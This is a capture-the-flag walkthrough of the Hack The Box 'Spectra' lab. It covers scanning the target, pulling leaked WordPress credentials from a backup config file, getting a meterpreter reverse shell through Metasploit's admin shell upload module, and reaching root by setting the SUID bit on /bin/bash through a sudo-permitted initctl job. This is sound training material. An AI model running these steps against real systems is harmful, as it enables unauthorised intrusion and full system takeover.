Today we are going to accept the boot2root challenge of Spectra –Hack the box lab. Through this lab, we are going to check our skills in WordPress Exploitation and basic privilege escalation.
Table Of Content
Reconnaissance
· Nmap
Enumeration
· Website enumeration
Exploitation
· WordPress Metasploit
Privilege Escalation
· Abusing Sudo rights
Reconnaissance
Let’s start our journey.
Start Nmap scan to know the open ports and services running on these ports.
Nmap –A 10.129.223.138
Through Nmap scan, we get to know that there are three open ports i.e. Port 22 –SSH version OpenSSH 8.1, Port 80 –HTTP, and port 3306 –MySQL.
First, we are exploring Port 80 in the web browser, and get a simple page with having two links Software Issue Tracker and Test.
http:10.129.223.138
Enumeration
Before exploring the links found above. We need to edit the host file and add spectra lab IP address 10.129.223.13
cat /etc/hosts
Now we will try to explore both links found after navigating port 80. Once we click on the test link we get the “error establishing a database connection”. It seems nothing important.
Look at the other link spectra.htb/testing, there are multiple file indexes as shown below image. For future analysis, we make our mind to open the wp-config.php save file.
Wp-config.php.save is the base configuration file for WordPress.After access it through curl we find something interesting in it i.eMYSQL database credential’s username ‘devtest’ and devteam01.
Curl http://spectra.htb/testing/wp-config.php.save
Happily, we login the WordPress but unfortunately, the above-found credentials are not working, and getting the error” Unknown username. Check again or try your email address”.
Spectra.htb/main/wp-login.php
Looking back, now it’s time to explore the first link software issue tracker found on HTTP 80.
This takes us to a simple WordPress page and just a sample post by the administrator. Through this, we get to know that we can try with the username “Administrator”. Again we log in on the wp-login page.
Great!! Successfully we logged in and it redirects to the administration email verification.
Just click on “This email is correct” and get into it.
Exploitation
After some enumeration, we find that the WordPress version is not updated. Accordingly, we explore the Metasploit exploit and set the required options as we have already fetched the username and password i.e. administrator and devteam01 respectively. Below is the module:
Use/exploit/unix/webapp/wp_admin_shell_upload
Set rhosts 10.129.223.138
Set targeturi /main
Set password devteam01
Set lhost 10.10.14.100
exploit
Wow!! We have a meterpreter session. Let’s go for the post enumeration for user.txt file and root.txt file.
While doing enumeration, we come across that except root and ngix users there is another user name as “Katie”.
Cat /etc/passwd
Very soon we decide that user Katie does not have permission to access user.txt.
Cd /home/Katie
Ls
Cat user.txt
Let’s enumerate furthermore, we hit in opt directory with a file called “autologin.conf.orig”.c
cd opt
ls -la
After reading the autologin. config.orig file we get to know that config file calls the credentials from passwd file placed at /etc/autologin.
Cat autologin.config.orig
Go the path /etc/autologin and enumerate it, we will get the password file. Read the password file.
Hurray!!! Get the Password is SummerHereWeCome!!
Cd /etc/autologin
Ls-la
Cat passwd
Privilege Escalation
SSH to user Katie, as we have the password for it. Through the id command, we get to know that there is one developer’s group, simultaneously we will check the sudoers permission we come across that user Katie has root permission for /sbin/initctl. Now, exploring the developers' group there we get the test config files. Then open the test configuration file, which is stored at "/etc/init," as shown below.
Id
Sudo –l
Find / -type f –group developers 2>dev/null –ls
Cat /etc/init/test.conf
Edit the test config file and replace the existing content with the following script:
Chmod +s /bin/bash
As Katie has root permission to execute the initctl, through initctl we will start and stop the test and execute the /bin/bash –p command to get the root.txt.
Finally, We capture the ROOT flag.
